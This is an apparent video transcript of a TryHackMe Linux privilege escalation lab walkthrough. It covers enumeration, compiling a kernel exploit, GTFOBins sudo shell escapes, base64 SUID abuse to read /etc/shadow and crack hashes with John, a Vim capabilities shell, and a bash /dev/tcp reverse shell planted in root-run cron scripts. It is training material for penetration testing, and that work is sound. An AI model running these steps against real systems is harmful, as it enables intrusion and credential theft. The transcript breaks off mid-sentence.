Alright, what's up guys? So today we're doing Linux privilege escalation. I'm going to tell you guys right now, this box is very long. This is probably going to be a very long video. I was going to split it up and decided I don't want to do that. I want you guys to be able to just find it and go through if you want. I'll tell you, I'm not going to cover every single thing as in depth as I usually do because otherwise this box would take probably 2 hours to finish on video. Now, first thing, what is privilege escalation? Privilege escalation is simply when we get a foothold in, typically on a pen test specifically, you're not going to get an admin account first try. You're going to get a lower end account, and you need to elevate that to an admin account or an account that has privileges that you need to access what you're trying to get. So that's what it is. I'm not going to dive into it, whatever they're saying. So here, this is exactly what they're saying. Here's the things you can do when you get an admin account. You can reset passwords so you have an account that you can always access, bypassing access controls, editing the configurations, enabling persistence. That's huge so that you don't lose access, things like that. That's the type of stuff that we're going to be, or that you would be doing once you took over the admin account. Now, I will tell you, privilege escalation is not the same as taking a foothold in a network or anything like that. Privilege escalation is more it's more of a feel thing. Like you're gonna try things, but it's not necessarily a one shoe fits all type thing. You're not gonna be like, okay, well I did this last time, so it works over here. It's not gonna be like that. You're gonna have to mix and match. You're gonna have to play with things, and I think they did a good job on this. But there are some gotchas on this that I am gonna cover. I believe I already have this machine started. I'm not sure why. That is another problem with this box. I keep having these machines mess up on me. So, okay, it says it's good. We'll see. One thing I'll tell you guys, one of the gotchas I found using the Try Hack Me labs is that I always SSH into them because if I switch back and forth to these boxes, it logs me out every single time, which really ruins reverse shells and things like that if you're constantly logging me out. So I SSH into them every time. You don't have to. I'm just telling you, if you're having issues, try SSHing into them. Okay, so first thing, enumeration. So we've covered a lot of this, so I'm going to go through this fast. So the host name, if you type hostname command, you're going to get the host name. Now, that might not be very useful to some people, right? But as we'll see here, if we SSH into, and you notice every time it's going to be Karen, password 1 is going to be the actual login until the final box. So we're going to do 10, 10, 199, 116, yes, and then password 1 every single time. All right, so now you'll notice if I do hostname, it's actually a little bit helpful here because we do get Wade7363. Might not seem helpful, but we probably have another username or user account. We probably know there's a Wade somewhere involved in this. Now, there might not be. It could just be whatever, but it's just sometimes you'll get things like this, like Ubuntu, blah, blah, and that alone gives us information on what kind of operating system it is. So here, uname, TAC A, and you see we're getting not only the host name here, but you're also getting Linux, the version number, things like that. Here, the proc file system, this is going to tell you information about it too. You can just cat it to look at it. Proc version. And you see, you just get a little bit more information on it. Cool, awesome, good to know. The Etsy issue files, same thing. You can see here a little bit more of a simplistic view. All right, now PS command, that's going to show you the processes that are running. If you do PS aux, that's going to show you processes that are running on every user. So not only if you wanted to, if you're just checking to see what processes are running, you also will get to see some users that you didn't know about. So like you'll see root, obviously. Let's see. Some of these are rootkit right there. Some of these are service accounts. If you're not familiar with those are, I'm not going to dive into them. We don't have enough time on this. But basically meaning that they're not actually being used by somebody. They're being used by services. So, all right. That's some of the things you can do to actually get some information. Now, env is environmental variables. So what you're seeing here is you're actually seeing like when you type shell, it's going to bin shell, which is the bash shell. Or no, that's actually just the regular shell, not the bash shell. Excuse me. So present working directory, you can see that's what it currently is set. These are variables that you could set, change, do anything with, and then every time you type that, so like let's say instead of using InMap, you wanted it to just be in. You could have a variable that says InMap here and then points to InMap, and it would just be whatever you put. That's what a variable is. That's just a shortcut in a sense. Sudo L, this is important. Sudo L will tell you right here, sudo password for Karen would type it in. Boom, sorry, can't use it. So sudo L will tell you if you can use sudo and what you can use it on. Karen, she can't use it. She sucks. We got to figure it out. Everyone knows Karens are the ones that complain, so we want to switch to someone else. We don't want her. All right, so one of the common commands used in Linux is ls. Obviously, we know that. Again, I'm not going to dive into it. ID, this command provides general overview of users' privileges and group memberships. So if you type ID, it's the same as if you looked at the shadow file or the password file. You're going to get their group user IDs and things. You can see here, boom, there's her user. She belongs to her own groups in Linux. If you don't have a group, you just belong to your own. You create your own. So there's no groups is basically what that's telling us. Cool. All right. Now here's the Etsy password file. The same thing you're going to get there, but you're going to get it for all users. We're not going to dive into that yet because we're going to use it a lot. History. If you log into a fresh box, you can type history and see what the last commands were written. ifconfig, that's just information from the network. Netstat, same thing. These are important because, especially right here where, let's see, if you're looking at netstat and you're looking at listening ports and things like that, you can read through this and do it, but it's important to know what you're looking at and how to do it because you can actually map a network a little bit based on these netstat, meaning if I do netstat and I look at this, I know, okay, that's their gateway because they're hitting that. This is a connection they have with another server internally, so on and so forth. And I'm seeing the connections and I can map where I'm going to start traversing to on a pen test. The find command. Find, very common. This is one we're going to use all day long today. Actually, we're going to probably use this one right here. But either way, so the find command just helps you find things. You can see that you can find files specifically with certain permissions, writable files. This is another thing you guys are going to see a lot today. This to dev null. All that is telling errors to go to the dev null folder, which is just not be seen, get rid of them. If you don't do that, every time you do something as a lower end user and you get file permission denied, which will be thousands and thousands of them, it'll pop up on the screen. If you send it to dev null, you won't get that. You won't see them. So that's important. Here you go. So find command on the root directory, permissions, and here's the permissions that you want they're looking for, and then you can see the to dev null. So the to dev null, again, all it does is get rid of the errors. Just keep that in mind. You're going to want that. Okay, so find development tools. So you can see it's important to know what languages are on the actual machine. The reason that's important is simple. If I'm trying to run a Python script on their machine and they don't have Python installed, it's not going to work, right? All right, so here's what is the host name of the target system. So if you remember, we already did this. We typed host name, and we got Wade7363. What is the Linux kernel version of the target system? And you can see right here, if we scroll up, this is walking us through it, the guide. So I actually recommend, as you're going through this guide, typing them out so that way you're genuinely finding this information, because otherwise you're just going to be kind of going back and forth, up and down. So you type uname A, and you can see we get the 3.13024 generic. It's down here. All right, now what Linux is this? Now this one, you're gonna think that you probably can find it because it's Ubuntu right there, bum bum bum. But they're looking for something specific, and what they're looking for is you to run. I think the Etsy issue. They want you to open that. So Etsy issue. And you see you get the Ubuntu 14.04 LTS. That's the specific answer they're looking for. What version of Python language is installed? All you got to do, now they want you to do this, find name Python. If you just type Python, I'll tell you right now, it'll pop up and you'll see the Python version right there. That's true with most Python versions. The only reason I don't say all is because maybe some older ones that I don't mess with don't do that, but So now here's you're probably wondering like, okay, so we're getting information, but what are we doing with it? Here's what you're doing. What vulnerability seems to affect the kernel? Enter a CVE number. That's the CVE number. What they're wanting you to do is take that kernel version, okay, and take the actual kernel and look, basically do some research and find what vulnerability this is. Now, all you got to do is take the kernel to where was it? I know we just had it. We can even probably just do this and copy, and we don't even have to do that. We can just do Ubuntu 14.04, and anytime you see EOL end of life, it's a pretty good sign there's something wrong. So we'll just say CVE. Yeah, whatever. All right, so we can't. Let's see. And there's a specific one. If you look on here, there's a specific. We'll go up here and type out to get this specific thing here. You can see here. This is. You can type this specific version of it. Uh, 3.13.0. All right, you can see right there is our exploit. All right, and here is the CVE number. So just a quick Google search, find that. You guys can mess around. There's probably a lot of vulnerabilities in this, to be honest. But this is the big one that they were looking for. And you're probably looking at this and going, what? That's fine. This is the actual payload. This is what you're going to be using, if you will. So as we're going down, all right. So now it's asking us, scroll down here. All right, so we've already done that. For some reason, I was thinking they wanted us to take over the machine, but they don't even want us to do that on this one. They just want to see it. Perfect. Okay. I'm just going to let you guys know I'm going to terminate the machines and start up the next ones every time, or try to, before I even start talking about what's next, because this, like I said, it's going to be a while. We're at 12 minutes. It seems like I'm going real fast, but it starts getting a little bit harder. So automated enumeration tools. You'll see these a lot. If you guys aren't familiar with these, that's okay. There's linps. There's also WinPs, if you're not familiar. WinPs is just a Windows version of linps. Linenum, Linux exploit suggester, smart enumeration privilege, blah blah. Okay, these are all different things. But basically, what they do is they run these checks on the machine. Okay, and they tell you this is vulnerable, whatever. And they're doing what we're doing manually throughout these boxes, but they're doing it automatically. It's a really good thing to do. Just keep in mind that these are not perfect. They will give you false negatives, false positives, and they will have you sometimes chasing rabbit holes that don't exist. So keep that in mind. All right. My dog just kind of freaked out for a sec. So here it says install and try a few. I do recommend that you try them. linps and WinPs is very good. You'll see that a lot in some CTFs and stuff. All right. So now we got privilege escalation kernel exploits. So, okay, so they actually do have us do the previous box, which I thought they did. I couldn't remember. All right, so we got kernel exploits. I'm just trying to keep up with what I've got over here, so that way I've got all the commands and things, because otherwise I'd be here all day getting them all written back down. All right, so once this starts, we can actually go here, back to our box, because like I said, I try to SSH into all the boxes. I try not to open them on that, because every time I switch back or click off of it, it will actually kick me off. And that might not be true for you guys. That's just what I've found, that sometimes I'll come back and it's kicked me off. So I just prefer this way. Okay, so we're in again as Karen. Now here it's telling us find and use the appropriate kernel exploit to gain root privileges. Now here it's telling you some hints and notes about researching. These are good research notes. this is a big one. Being too specific about the kernel version. Sometimes if you're searching for something and you're like version 1.2.2.3.4.patch. What it's like that's such a specific patch that someone would on Google would have had to put that key in there for you to find it. Where if you just put like Linux 14, you know what I mean? Then a lot of vulnerabilities would pop up and you could dive in a little bit deeper. Here it's telling you here you could also use tools like LES or LinPs or any of that. Exploits require further interaction once they're run. Read all comments and instructions. That's important. So when you're on GitHub or something like that, and you're downloading these, basically make sure you know what you're doing, because if you don't, you might get halfway through it and go, it's not working, but there's required steps that you're not doing. All right, so now here, this is a big one. You're going to see me use this a lot. I like simple servers, so for me it's something I use all the time, and I've used it in the real world all the time, so keep that in mind. All right, so here we go. We know the CVE number, so we don't have to worry about that. And the only reason I say that is because it kind of gives it to you, if you get what I'm saying. You could sit there and search for it, but look at the hint. Look for the exploit codes related to the CVE you found in the previous task. So you kind of know what you're looking for, okay? All right. So now if we go to here, and I'm just going to give this to you guys, but if you did research, you guys would find this anyway. If it runs. One thing I've noticed is the attack box also isn't running very fast today. I don't know why that is, but whatever. So I have www.exploit, exploit DB just like normal. Now the exploit 37292, that's the one we're looking for. All right, boom. All right, so now, sure, whatever. This is a attack machine. All right, so here's the code that we actually want. So keep that in mind. You can download it if you wanted to. You can do whatever you want to it. My dog just scared the other dog. And you can see right here, here's copy. So we copied it. We can download it, whatever you want to do. I personally download it only because sometimes you can mess up and you can accidentally like copy a space or something and then be chasing that down forever, and that's really frustrating. So personally, I download it. Now, a lot of you may wonder or may ask, okay, well, I've got the download, right? So what do we do now? So here's the problem, right? So we have the download, but we need it onto our target machine because this is going to do the exploit for us. So what we need to do is we need to change to downloads, okay? And it should be in there, and it's not. So now we got to figure out where the heck it downloaded it. Maybe. There we go. Okay, so it's actually in root. It's not, they don't put it in downloads on this machine. Okay, cool. Even easier. So we'll go back to root. And you can see it's right there, 37292.c. That's super easy. That helps us out a lot. So now all we got to do is do our Python 3 tacm http.server, okay? And then you got to put whatever port you want to do. You guys will notice there's a lot of people that do like 8888, 6666, whatever. I almost always do 1234. Doesn't really matter. I've always done it. Now you'll just go here and you'll say wget, which is just reach out to the web and get whatever I'm telling it to. And then we'll say http and we know our IP up here. If you're on the attack box, it's always up here. That's a really good tip if you guys never see it. 10.10.111.32. And then you've got to make sure you tell it where you're trying to get it from, because one thing I see a lot happen is they put the HTTP down here, but they don't put the port that they're actually serving it on, which is, for me, 1234. And then what do we want? And it's, I gotta remember the exact name here. 37292.c, 37292.c, and that should do it. Cannot write. Okay, so a perfect example here. Let me show you here. Here's one of the problems. So the directory that we're in is, I think we're in, yeah, we're just in root here. We need to copy this to something we have permission to. So I usually just use the temp folder if I can. So cd temp, and you can't do that. So wget http 10.10.111.32 37292.c, and you can see there it is. Now it's in there. So all that happened there, guys, if you don't understand, is we're in the root directory. Because we're not root, we're not an admin, we can't write in the root directory. So we had to find one that we could write in. You can actually find that up here. They explained it a little bit better, but I just went to the temp directory because typically temporary directory can be written to, and now we have it. So now, even though we have it, we have to look here, ls tac la, and we see that, okay, so 37292, we can read and write it, but we can't execute it. So we need to change that, right? Because if we just have it sitting there, nothing's gonna happen. So first things first, we gotta compile it because it's a compiled language. So that's where we know that this machine actually has the GCC tool on it, which is perfect for us. So now 37292.c. So that's just telling it to compile it using the compiler code, okay? And it's going to actually compile it. And then what output do we want? And we're just going to say CVE. We don't need it to be anything crazy. Okay, and it's going to compile, boom, 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 boom. And you can see now if we hit ls, there it is. Now we have to change the permissions. If you don't change permissions, all you'll have is read and write access to it. So change mod. And I always do 777 on these boxes because, yes, in a real scenario, I probably wouldn't do that on my own machine because it makes me vulnerable. I don't care about these boxes. So 777 gives all permissions to it. And we're going to say CVE. Boom. Now we should be able to, when we hit ls, there's our CVE. We should be able to run CVE. All right. Now we type who am I because it mounted. And now we're root. Look at that. So now we have root access. Now we have access to everything. So now it says what is the content of flag1.txt. Okay, so what do? We just say find name flag1.txt. And you're going to see a pattern here. All right, if I could. And you can't do that. Drives me nuts. But anyway, I'll show you guys. You're going to see a pattern here. And the pattern is pretty easy. The pattern is almost all the flags are going to be in the user or the home directory. So if I find, and I do it now with looking through the root directory, which is what I didn't do on the last one, flag1.txt, it'll find it. Home mat. Okay, I'm not going to sit here and wait for mat. So we're going to say cd home mat cat flag1.txt, and there you go. There's our flag. So all I did there was looked for it using the find command. Every one of them is going to be in a home users directory. I'll just tell you that now to save you some time looking for them. They're not very hard to find, but just to let you know. So now we need to terminate that machine, start this machine, and start talking about Sudo escalation. So that was kernel exploits. So what that means is that was an exploit, actually a flaw in the system. Okay, that's a flaw in the actual build of the OS. Okay, that's totally different than a flaw in a configuration, because a flaw in a configuration means that somebody didn't secure it, or they improperly secured it, meaning they left, like for instance, if someone left the root user's admin password as admin, right? That's a configuration issue. The Ubuntu didn't make that mistake. Ubuntu didn't mess up and make a flawed system. The system administrator who designed it made a flawed system. So keep that in mind. There is a difference, and it's important that you know the two. Okay, so now we're looking at privilege escalation sudo. We got to wait till we see it. So these are basically, if you guys aren't familiar, when you use sudo on Linux, it gives you root access. So that's what we're trying to take advantage of, is what can we sudo, meaning what can we take advantage of that will give us root access. So now, once again, we SSH Karen at 10.10.255.196. Boom. Maybe. There we go. Password 1. Hopefully that worked. Sometimes this thing lags and it misses a letter or two. Yeah, it didn't work. I didn't think it did. All right. So now this GTFO bins is a huge resource that you're gonna want to use constantly, not just here. But we'll go ahead and open that in a new tab and just keep it there for now. Thank you for finally logging me in. All right, so first thing, if you remember, we tried this earlier and we couldn't do anything. But here, if we type sudo L, it looks like here are the 3 commands that we can Karen can actually run using sudo, meaning as root. So she can actually run the find command. That's important because, like right here, we could actually just find, if we wanted to, the flag. Now, we couldn't read it using the find command yet, but we could find it because we're allowed to run find as root. So keep that in mind. That's kind of a big deal. So now it's going to explain some more stuff here. You can see here it's explaining the preload option, the LD preload. On some systems, you may see the LD preload environment. It allows it to use shared libraries and then allows you to change that. That's great. I like that they explain it. That's not what we're doing here because that's not what the flaw here in the system is. So keep that in mind. All right, just trying to find where I am. Okay, so now first things first, let's go ahead and say sudo find, right? Because all we want to do is see if we can find the flag first, because I think it's flag 2. Okay, flag 2, yep. So find name. And you're going to see what we mean by this. So sudo find, and then we're going to say name flag2.txt. Okay. All right, it's searching through everything here. And it may not find it. If it doesn't, oh well. We know where it is. We know it's in the users directory. Okay, but the point is that we can run sudo on find. I'm not going to wait for this. We can run sudo on find and it doesn't stop us. So that's important because you can actually use sudo. So GTFO bins, you go here and you type in find and you say sudo because that's the option that we have. And look at this. This will give us a shell right there. Find. So I'm going to move that over here so I can copy it. Okay, so sudo. Okay. Actually, we'll just do find dot exec /bin sh for shell. All right, and then quit. Now what this is using the find command to escalate privileges. Okay, so now you notice I'm still Karen, and of course you can't do that. So now sudo, meaning I want to run it as root. We're going to go ahead and do it this way. Okay, and boom. Now if I type who am I, if I can spell who am I, now I'm root. So look at that. So GTFO bins is actually a great tool that lets you look for flaws, if you will. So let's say you can use any of these commands like apt and you're allowed to sudo it. Well, they'll give you a way to take advantage of that. So GTFO bins is a great resource. I've used it for years. I recommend it. So now, how many programs can the user Karen run on the target system with sudo rights? Well, if we look here, it's nano, less, and find, so 3. What's the contents of flag2.txt? Well, if we look at where we're at, and we say, okay, cd home, ls, cd ubuntu, there's our flag. Boom, there's our flag, okay. Now, how would you use nmap to spawn a root shell if the user had sudo writes on Nmap. So what they're asking here is they want you to go onto GTFO bins, and they want you to look at Nmap, and if you had sudo writes, and they want you to tell them this right here, sudo nmap interactive. That's what they're looking for. And the reason they're looking for that is because they want to see if you understand how GTFO bins works and if you know how to use it. All right, so now, what is the hash of Frank's password? So this is just simply, they want you to go in and they want you to say, okay, cat etsy shadow. There's Frank's hash, copy it over, and boom, you've got it. Now, this is where we're going to start diving in a little deeper because we're going to actually start taking advantage of some of these things, meaning that we're going to actually start cracking some passwords too with this. All right, so here we go. All right, so now SUID. So there's a difference between sudo and SUID. Now you'll notice on here there's SUID on these as well on GTFO bins. So it's a good resource, but don't think they're the same thing. Okay, so sudo means that you can run that as root. They gave you permission. They said, okay, you can run it as root, whatever, right? Now, SUID is a bit that's turned on these. I thought there was a picture of it somewhere here. There is somewhere. All right, I thought there was. So basically, it's a permission that's set on these. So you can see here, they're looking for, and this is what we're going to do, a file with permission set at 04000. Now what that means is they're looking for a file that has this little S. I don't know if you guys can see that, but there's a RW for read, write, then there's that S. That's the SUID bit. What that means is, and you can see here, they'll tell you here, but basically that's a set user identification. That means that whoever runs that, uses it, whatever, it shows here the file is executed with permission of the file owner or group. Meaning, see how root owns these? Root owns them, so it's ran at whatever access the owner is. So not whatever access you have, not if you sudo it, whatever access the owner has. So that's important that we look for that, because if someone, let's say someone's just doing all their administration as root, which they don't recommend you do, this is why it can be a problem. Because if you're sitting there creating scripts as root and someone can edit that script because you have permissions messed up, that means they can change that script to whatever they want and use the SUID on it if you have it set. Now, what you could do is you could set the SUID on your machine, or on your file, right, as a regular user, and then you could edit it with root, but keep the owner as the lower end guy, and then you wouldn't have to worry. But if you create it as root and you have that SUID set, you're in trouble. All right, so sudo, I don't know why I typed sudo, SSH, Karen at 10.10.74.94, yes. And you guys can see how this is starting to get longer, but it's very good information, okay? Very good. All right, so first thing we're going to do, we're going to type that exact command, find. So we're going to say find, and then that little forward slash, that's saying root directory is what it's saying. Type F permissions. We want 04000 ls. Then we want to send all the errors to dev null, meaning we don't want to see the errors. Because if we sit there and look at the errors, we're going to sit there all day long. All right, here we go. So you can see we're starting to get a few. We're getting a decent amount, but are any of them useful? And I can look. So we have ping, boom, boom, mount, open SSH. Okay. Do we have anything crazy here that we... Ooh, base 64. So base 64 is a tool that lets us base 64 encode. But let's see something interesting here. So since we can base 64 encode, have we tried... Let's try this. So we want to base 64, because base 64 is now going to be ran as the root permission, if that makes sense to you guys, because root owns it and it has that set to where it runs as the root, okay? So what we're going to do, base 64, if you guys aren't familiar with base 64, all it is literally a tool that lets you base 64 in code, okay? And so what we can do is we can do base 64, and we can simply say our etc shadow file, which has our, we're going to do the password file first just because we need them both. So etc password, and then we're going to put a pipe, and then we're going to say base 64 again, but now we want to decode it, okay? Now the reason we're doing this, it sounds silly, right? Like why would we encode it and then decode it? Because this is ran with root permissions, and we can't read these files. So if we do this, it opens it, encodes it, and then decodes it, but we took advantage of it and made it print it out for us, even though we don't have permission to do this. So now we're going to go ahead and copy all this. Copy. Cancel. Paste. File, save. And I'll show you what we're doing here. We'll go ahead and just put them on documents. Doesn't really matter. And we'll just name this password.txt. You can name it whatever you want. Okay, now we'll go ahead and new file, exit that one. Now we're going to do the exact same thing, base 64. And if this doesn't make sense to you guys, all it is the base 64 is literally has permission to run this as root. So it has permission to read files that we can't normally read, and the shadow file is one of them. So base 64, etc shadow file. Now, if we just did the base 64 without putting the pipe and then the decode, basically what would happen is it would just be all encoded. We wouldn't be able to see it. All right, so here's the... Be quiet. I don't know what your deal is, dude. I don't know what the hell his problem is. All right, so knock it off. These guys are freaking going nuts. All right, so now if we open this, paste it, save it, maybe. Then we go to documents because we want it in the same one. Oh, I guess I put it in the root directory. I didn't realize that. That's all right. And we'll say shadow.txt. All right, so you might wonder why I put them in the same directory. It's because we're going to actually, this can be stopped. We did that earlier. It's because I actually wanted them where I could access them. So there's password.txt and shadow.txt. So if you guys have never used John the Ripper, you need the password file and the shadow file. You just have to have them so it can put them together. But basically what you're going to do from here is you're just going to do what's called unshadow, and you're going to see it will put them together. So password.txt and the shadow.txt. And then from there, we'll just put it in cracked.txt. You can put it in whatever you want. All right, so now when we hit it, that cracked.txt is sitting there. And then now we're going to use the actual John the Ripper. If you guys haven't used John the Ripper, it's a great tool. You have to say John, and then specify word list that we're going to use. Word list, and it's equal to, we're going to use the etc, and then the user share word list rocku. If you guys aren't familiar, the rocku.txt comes on all Kali boxes. And there you go. And then you just have to specify which one you want to use. So we want to use the cracked.txt. And we hit enter. And you can see it's going to run, and it's going to try and crack those passwords that we just gave it. Now, you can see here, it found Karen's and it found user 2. So which user shares the name of a great comic book writer? Jerry Conway, right there. Boom. What is the password of user 2? Password 1. And in a real situation, these aren't going to crack that fast, just heads up. It's because they're so easy to crack. Now, what is the content of flag3.txt file? If you guys just log in as one of these users, run it, look for it, it'll be in their home directory. That's where that's at. Okay? I'm going to make you guys challenge just a little bit because, like I said, this is a long box, and I want to see you guys do some stuff. Right? I don't want to do everything for you. All right. So that's a fun one because we just cracked our first passwords that I think we've done on the junior pen testing. I mean, it's been a long path, so I don't remember. Maybe we did use John the Ripper on something, but I don't remember using John the Ripper. All right, so now capabilities. Again, another option here in GTFO bins. Capabilities, that's what they're called, okay? So keep that in mind. When you're looking, you need to know what the difference is. So here you go. So you can see here, another method, blah, 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 increase privilege level capabilities. Capabilities help manage privileges at a more granular level. So again, it's managing privileges, but this helps out the admins. Anytime an admin is, I don't want to say they're taking a shortcut, right? But if it's helping them, it's more likely that they will slowly slip and do it incorrectly because it's already being easier for them and they'll keep getting easier. That's not to say that's true on everything. I'm just saying in my experience. All right. So you can say we can use the get cap tool to list enabled capabilities. So we can actually first SSH into it, obviously. SSH Karen at 10.10.139.169. Yes. Password 1. Boom. And I'm not sure why they make you start every single new box. I mean, maybe they just didn't want to have all different vulnerabilities on one box, but either way. So let's see. If the system administrator does not want to give this user higher privileges, which is pretty fair, right? They can change the capabilities of the binary. So what that means is the binary would get through its task without needing higher privileged users. So let's say you need to take backups of your stuff every day. That backup script might be able to run as root no matter who runs it because it's only doing a backup, right? That's basically what we're looking at here. So get cap, tac R, and what we're looking for is things that have okay, and you can see here, this is what it looks like when you don't do the dev2. And I'm going to stop it because it's just going to go all day. But that's what it looks like. So you can see here, get cap, this will generate a huge amount of errors. And right there, they said it, and we still didn't do it. Or I should say, I didn't do it. So get cap, tac R, then the 2, dev null. Now when you do it, it should look a little bit better for you. My dogs are going nuts. All right, so please note that neither Vim nor its copy has the SUID bit set. Okay, so what that means is, what they're trying to say here is the example they're using. You went down, Pooks? The example they're using will look like it's doing the same thing that the SUID is doing, but it's not because you can look and see that it doesn't have the SUID bit set. So that's what they're saying. They're saying, notice that it doesn't have that set, but it's still doing the same thing because it has capabilities. All right. So this will launch. Okay, so this is an example that they're going to use, and then we're going to go ahead and do the same thing. But we've got to figure out which one, that they're looking for. Now, if you look, it's slowly going. If it'll freaking go. It's kind of frustrating because I know which one we need and I'm waiting for it to pop up, but it's not popping up. Okay, there's Vim. So right there, Vim. If you guys don't know what Vim is, I don't want to say old school because it's just been around a long time. It's still a good text editor, but it's a terminal text editor, so it's very good. You just have to. I recommend pulling up a Vim cheat sheet if you aren't familiar. Okay, so what we're gonna do, we're gonna go to Vim, okay, or go to GTFO bins, Vim, and then we want capabilities. Okay. Okay, so it says here, if you do this, it should work, right? That's basically what they're saying. Now, I will tell you, and it says it right here, if you have Python 3, you need to change that. Well, we do have Python 3. Another thing I'll tell you, I'm going to pull this over and type it out because you can't copy and paste in between, so that's all right. So we'll go ahead and do Vim Py. Now, keep in mind, you need Py 3 here because the attack box does have Py 3. Import OS. Now, if you guys aren't familiar with what's going on, These are binaries that someone has already designed specifically for this task, because it's a known thing that if Vim has the capability, it can do this. And you'll notice what it's doing is it's going to spawn a shell for us. And if you guys are familiar with reading code at all or anything like that, even if you're not really that familiar with it, you can kind of get the gist of it just by reading it. And what I mean by that is you can actually see it. These dogs are going to drive me nuts. All right. Sorry, those dogs are freaking driving me nuts. All right. So you can actually follow along with the code and look at it. Kind of see what's going on. All right, so we're going to hit this. Hopefully it works. Let's see what happens. All right, now we type who am I? And we're root. It's that easy, guys. Now, it's not going to always be that easy. But what it is it's taking advantage of a capability that Vim has, which is to run as root by itself. That's a capability, not a set permission or anything. It's called a capability. So keep in mind they're different. Because the reason I say that and I emphasize it is because if you are searching for SUIDs or Sudo or anything like that, you're not going to find a capability. You have to search for it, okay? So now, complete the task described above on the target system. We did that. How many binaries have the capability? If we go back, we can see that it actually popped up. It was 6. What other binary can be used through this capability? View is the other one. There was another one there. And then what's the contents of the flag? So now we just need to do cd home. I don't know who it is. Okay, cd ubuntu. And then cat flag4.txt. All right, and there you go. Now, keep in mind, you can actually, instead of spawning a shell, you can change that command to just do the cat flag4 if you wanted to. You can do all kinds of stuff. So keep that thing in mind that you don't always have to spawn a shell, but it's cool to do because then you have the machine taken over. All right, cron jobs. This is one, in my opinion, you're going to run into on CTFs a decent amount. You may not, but I've ran into them a decent amount. But a cron tab, what is it? Cron tab is the same thing on, if you guys have ever gone on Windows, and I'm sure we're going to cover these on Windows in the next box, but if you guys have ever gone on Windows and you've had a scheduled task, it's the same thing. A cron tab is a scheduled task on the machine. So let me give you guys a scenario, which is basically what we're going to do. So you have a scenario, you have a script that runs backups every night, right? It runs backups at midnight, and that script, all it says is, hey, copy the backups to this server, right? Cool. Sounds pretty, media. Doesn't sound like anything can happen, whatever. But it runs using cron tabs, and it runs every night. Well, that script that runs every night, if it is editable, meaning I, as a low-end user, can edit that script, I can just set that or change that script to give me a reverse shell that night at midnight because it's already set to run. So it's just going to, the other thing to keep in mind is even if it's not editable, if you don't configure it correctly, meaning you don't keep up on maintenance, meaning you don't delete them, things like that. So I'll show you what I mean by that. So first thing, SSH. Karen, you're killing me here. Karen at 10.10.60.142. Yes. All right. Now, here there's some gotchas in this one too that I'm going to make sure I cover for you guys so that way you guys aren't sitting here for hours trying to figure it out. Okay. So, first thing first, you got to read the etc cron tab file to see them. Okay? All right, we've got 4 things running, and it looks like they run every minute, which the box did that for us. That wouldn't actually happen. Okay, I'll just tell you that. One thing to keep in mind, too, when we're setting up a reverse shell, we need to have our listener up. So netcat, LVNP, VNLP, whatever you want to put. I just do 1, 2, 3, 4, like I said. and it'll listen for me. I just do that out, get that out of the way. So the one I like to do here, because I would normally do this test.py, reason because it's in the temporary file, people aren't going to check that. The one they probably want us to do is the Kern backup, so that's one we're going to do. Now, if we're in the root directory, or the home directory, the backup.sh is right there, okay? Now, if we change directories to temp, and we list it, you notice the test.py is not there. This is important, because what it is someone messed up, and they didn't take this out when the script got deleted. So that means I could create a script named test.py in the temp directory, and it will run for me, okay? And we'll go ahead and do that since we just changed into the... So first thing I'm going to do is vim. So we're going to use vim, and then I'm going to say test.py. So I'm going to create this file, okay? And then if you don't know vim, just look up a cheat sheet. I'm telling you right now. So I is insert, and we're going to say we want to do bin bash. Now, if I remember correctly, they actually give you, I think they give you a, I could have sworn they gave you a, somewhere where these existed, this script. Maybe not. But anyway, if you guys are wondering, you can go to Pentest Monkey. And you can just do reverse shell. These are great resource. Here's what we're gonna run. The bash, that's all it is. It's that simple. Now I've got to bring it over here so I can type it. So there's the bin bash. You have to specify what you're doing. And then we're gonna say bash tac I. We're gonna say and then we're gonna say dev TCP. Now this is to reach out to the reverse shell. So we need our IP, which is 10.10.111.32. Okay. And then the port, which we did 1234. And then we're going to say and 1. Okay. So that's all you got to do. And then to save it, if you don't know if you don't know vim, again, it's escape WQ to save it. Okay. I know it doesn't make any sense. I'll never understand it, but that's the case, okay? So now that's supposed to run every minute. Now, we still have to change things on it. So number one, it has to have the right permissions, okay? That's just necessary. So change mod, and we're going to say test.py, okay? Now let's look at it. All right, now here's the only thing I don't like. It's got the Karen as the owner. I want to change the owner, and I want to, let me get rid of this here. I want to change the owner, and I want root for test.py. Okay, so it's actually not letting us, which is fine. If it doesn't work, we'll have to do the one in her home directory, which we'll go ahead and do that one as well. And the reason for that is you notice when you're looking at the cron tab, it's looking for one owned by root, okay? So what we're going to do is we're just going to say cd home, and then we're going to vim the bash, what is it? Oh, backup.sh. Okay, perfect. And you can see they've already kind of got some stuff in here for us. So we'll go ahead and get rid of all that. You don't need it. All right. Hit another space on them. And then we'll just go ahead and change it right back to what it was. And that was bash tac I and dev. And if you notice, guys, I'm still looking at the actual script, right? I don't have this specific bash reverse shell memorized. I'd be surprised if people do, unless you're using it all the time, which I'm not. So keep in mind that it's okay to look things up. It's not a sin to have cheat sheets all over the place. I know where I used to work, now I work at home, so I can just have my notebooks and stuff. But where I used to work, I used to have cheat sheets literally everywhere. I would have them all over my desk. I would have all kinds of stuff. Okay, you can see I already had it. So even though I changed hers, it actually ran, and I already had the root shell here. So we'll say, who am I? And that's from the temporary one. That's from the temp file. So you can see I have it. It's asking me how many user-defined cron jobs can you see on the target system, and you can see if we go back, there's 4: antivirus, backup, and test. What is the contents of the flag? 5. So we'll go ahead and say cd home, and we'll say cd ubuntu, and I hate that you can't tab it. All right, and there's flag 5.txt. There's our contents right there, and we've got the contents. All right, what is Matt's password? So for Matt's password, guys, I'm not going to do it for you because just in the presence of time, I am going to tell you how to do it. So you guys can do this. You guys have already seen me do this, and you guys should have already done it yourself. All you're going to do for Matt's password, you're going to open, so you'll notice I'm going to lose this connection here. You're going to open the password file and the shadow file. You're going to copy Matt's hash out of each of them, okay? Just like we did with the whole file before, but just Matt's. You're going to pull it out, and then you're going to save it as a password and a shadow, and then you're going to unshadow it to combine them. And then you're going to use John the Ripper, the word list, rocku.txt, and you're going to crack the hash. I'm not going to do that one for you guys. The password is 1234556. If that's all you want out of this, I would prefer that you guys actually learned it, but that's just me. Okay, now we're diving into privilege escalation paths. Now, hopefully so far you guys are with me because there's a lot of information thrown at you. All right, so now paths. Sorry, that sounds weird while I'm saying that. So first thing we got to do, again, SSH into it. It'll tell us the thing here, Karen at 10.10.189.64. All right. And they, for some reason, denied it. All right. Hopefully I started the right thing. All right, that was weird. Whatever. Maybe it wasn't up yet. Okay. All right. So what is a path? First off, so if you echo path, you'll see that there's paths that you basically are defaulted to, if 